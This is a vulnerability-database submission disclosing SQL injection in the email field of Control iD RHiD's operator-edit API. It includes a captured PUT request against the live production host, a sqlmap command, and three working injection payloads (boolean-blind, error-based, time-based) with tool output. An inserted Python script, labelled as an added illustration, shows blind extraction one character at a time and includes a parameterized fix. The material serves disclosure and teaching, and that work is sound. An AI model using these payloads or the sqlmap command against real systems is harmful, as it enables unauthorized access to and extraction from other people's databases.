Submission #106063: Control iD v23.3.19.0 SQL Injection via parameter JSON email (PUT) in Edit Operators.

Information

Title: Control iD v23.3.19.0 SQL Injection via parameter JSON email (PUT) in Edit Operators.
Description: The Control iD v23.3.19.0 product control web application has a SQL injection vulnerability in the Edit Operator section, in the "email" parameter of the PUT request.

PoC:

1 - After logging in to the application, go to: Settings > Operators > Edit an Operator.
2 - Click Save and capture the request with Burp.
3 - For validation, use this request:

PUT /v2/customerdb/operator.svc/a HTTP/2
Host: www.rhid.com.br
Cookie: _ga=GA1.3.376069673.1679840946; _gid=GA1.3.1767965208.1679840946; _gat_UA-9065969-5=1
Content-Length: 457
Sec-Ch-Ua: "Chromium";v="103", ".Not/A)Brand";v="99"
Accept: application/json, text/plain, */*
Content-Type: application/json;charset=UTF-8
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.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.VfCR1ZxQ0AnahJxo7Hx2_6RSUGDOP1REskhC47LZNDE
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36
Sec-Ch-Ua-Platform: "Windows"
Origin: https://www.rhid.com.br
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://www.rhid.com.br/v2/
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7

{"excluded":false,"id":3,"approvalFlow":null,"email":"[email protected]'","expiredPassword":false,"foto":null,"idApprovalFlow":null,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":""}

--------------------------

4 - SQLMap:

python3 sqlmap.py -r request.txt -p email --dbs --tamper=space2comment --random-agent --level 3 --risk 3

sqlmap identified the following injection point(s) with a total of 748 HTTP(s) requests:
---
Parameter: JSON email (PUT)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: {"excluded":false,"id":2,"approvalFlow":{"excluded":false,"id":1,"approvalFlowSteps":[{"excluded":false,"id":1,"idApprovalFlow":1,"idOperator":1,"step":1}],"idsCompany":[1],"idsDepartment":[2],"idsOperator":[2],"idsPerson":[],"includesAfdChange":false,"includesAfdOffline":false,"includesFacialRecognition":false,"includesGeofence":false,"includesJustification":false,"includesOverwriteAcjef":false,"includesSuspectAfdOffline":false,"mode":2,"name":"Fluxo Padrão","steps":1},"email":"[email protected]' RLIKE (SELECT (CASE WHEN (8993=8993) THEN 0x74657374654074657374652e636f6d ELSE 0x28 END)) AND 'SHab'='SHab","expiredPassword":false,"foto":null,"idApprovalFlow":1,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"teste25","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":"teste25"}

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: {"excluded":false,"id":2,"approvalFlow":{"excluded":false,"id":1,"approvalFlowSteps":[{"excluded":false,"id":1,"idApprovalFlow":1,"idOperator":1,"step":1}],"idsCompany":[1],"idsDepartment":[2],"idsOperator":[2],"idsPerson":[],"includesAfdChange":false,"includesAfdOffline":false,"includesFacialRecognition":false,"includesGeofence":false,"includesJustification":false,"includesOverwriteAcjef":false,"includesSuspectAfdOffline":false,"mode":2,"name":"Fluxo Padrão","steps":1},"email":"[email protected]' AND GTID_SUBSET(CONCAT(0x7162627871,(SELECT (ELT(6226=6226,1))),0x716b717071),6226) AND 'qvWu'='qvWu","expiredPassword":false,"foto":null,"idApprovalFlow":1,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"teste25","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":"teste25"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
    Payload: {"excluded":false,"id":2,"approvalFlow":{"excluded":false,"id":1,"approvalFlowSteps":[{"excluded":false,"id":1,"idApprovalFlow":1,"idOperator":1,"step":1}],"idsCompany":[1],"idsDepartment":[2],"idsOperator":[2],"idsPerson":[],"includesAfdChange":false,"includesAfdOffline":false,"includesFacialRecognition":false,"includesGeofence":false,"includesJustification":false,"includesOverwriteAcjef":false,"includesSuspectAfdOffline":false,"mode":2,"name":"Fluxo Padrão","steps":1},"email":"[email protected]' OR SLEEP(5) AND 'eVwS'='eVwS","expiredPassword":false,"foto":null,"idApprovalFlow":1,"idCustomer":null,"idPerson":null,"idRole":1,"idsCompany":[],"idsDepartment":[],"name":"Teste","newPassword":"teste25","personDepartmentName":"","personEmail":"","personName":"","personRoleName":"","restrictCompany":false,"restrictDepartment":false,"roleName":null,"showOnboarding":true,"userLocale":"pt_BR","passwordConfirmation":"teste25"}
---
[INFO] the back-end DBMS is MySQL
web server operating system: Windows 2016 or 2022 or 11 or 2019 or 10
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 10.0
back-end DBMS: MySQL >= 5.6 (Aurora fork)
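The following script is an added illustration of the mechanism the boolean-based blind payload above relies on; it is not code from the submitter or from Control iD. The RHiD schema and server-side query are not part of this advisory, so the operator table and the email-uniqueness check are assumptions, and SQLite stands in for MySQL (it has no RLIKE or SLEEP, so the probe injects a plain AND condition in the same `'<known email>' AND (...) AND 'a'='a` shape). It goes one step beyond the page by turning the true/false oracle into character-by-character extraction, which is what sqlmap automates, and shows the same probes against a parameterized version of the query.

```python
import sqlite3

ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def make_db() -> sqlite3.Connection:
    """Constructed stand-in data; the real RHiD operator table is not in the advisory."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE operator (id INTEGER PRIMARY KEY, email TEXT, name TEXT)")
    con.executemany(
        "INSERT INTO operator VALUES (?, ?, ?)",
        [(1, "admin@example.com", "Admin"), (3, "teste@example.com", "Teste")],
    )
    con.commit()
    return con


def email_taken_vulnerable(con: sqlite3.Connection, body: dict) -> bool:
    """Hypothetical vulnerable check: the JSON 'email' value is spliced into the WHERE clause,
    so the attacker controls the predicate and the response becomes a true/false oracle."""
    sql = "SELECT COUNT(*) FROM operator WHERE email = '%s' AND id <> %d" % (
        body["email"],
        int(body["id"]),
    )
    return con.execute(sql).fetchone()[0] > 0


def email_taken_safe(con: sqlite3.Connection, body: dict) -> bool:
    """Same check with bound parameters: the payload is compared as an opaque string."""
    sql = "SELECT COUNT(*) FROM operator WHERE email = ? AND id <> ?"
    return con.execute(sql, (body["email"], int(body["id"]))).fetchone()[0] > 0


def blind_oracle(check, con: sqlite3.Connection, condition: str) -> bool:
    """One probe in the shape of the sqlmap payload: a known email, a closing quote,
    the injected condition, and a trailing 'a'='a to re-balance the quotes."""
    body = {"id": 3, "email": "admin@example.com' AND (%s) AND 'a'='a" % condition}
    return check(con, body)


def extract_via_oracle(con: sqlite3.Connection, max_len: int = 8) -> str:
    """Recover operator 1's name one character at a time through the boolean oracle.
    SQLite's default BINARY collation makes the comparison case-sensitive, as sqlmap
    would arrange with BINARY/ORD on MySQL."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            cond = "(SELECT substr(name,%d,1) FROM operator WHERE id=1) = '%s'" % (pos, ch)
            if blind_oracle(email_taken_vulnerable, con, cond):
                recovered += ch
                break
        else:
            break  # no character matched: end of the value
    return recovered


def demo() -> dict:
    con = make_db()
    return {
        # vulnerable handler: the response tracks the injected condition
        "vuln_true": blind_oracle(email_taken_vulnerable, con, "1=1"),
        "vuln_false": blind_oracle(email_taken_vulnerable, con, "1=2"),
        # parameterized handler: no such email exists, so both probes look identical
        "safe_true": blind_oracle(email_taken_safe, con, "1=1"),
        "safe_false": blind_oracle(email_taken_safe, con, "1=2"),
        "extracted_name": extract_via_oracle(con),
    }


if __name__ == "__main__":
    print(demo())
```

The pair of `1=1` / `1=2` probes is the whole detection step: a differential response on the vulnerable path and an identical one on the parameterized path. The extraction loop is the same oracle asked a few hundred times, which is why sqlmap reported 748 requests for three techniques.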
Source: https://www.rhid.com.br/
User: Stux (UID 40142)
Submission: 26.03.2023 18:08 (3 years ago)
Moderation: 14.04.2023 08:56 (19 days later)
Status: accepted
VulDB entry: 225921 [Control iD RHiD 23.3.19.0 Edit a email SQL injection]
Points: 17
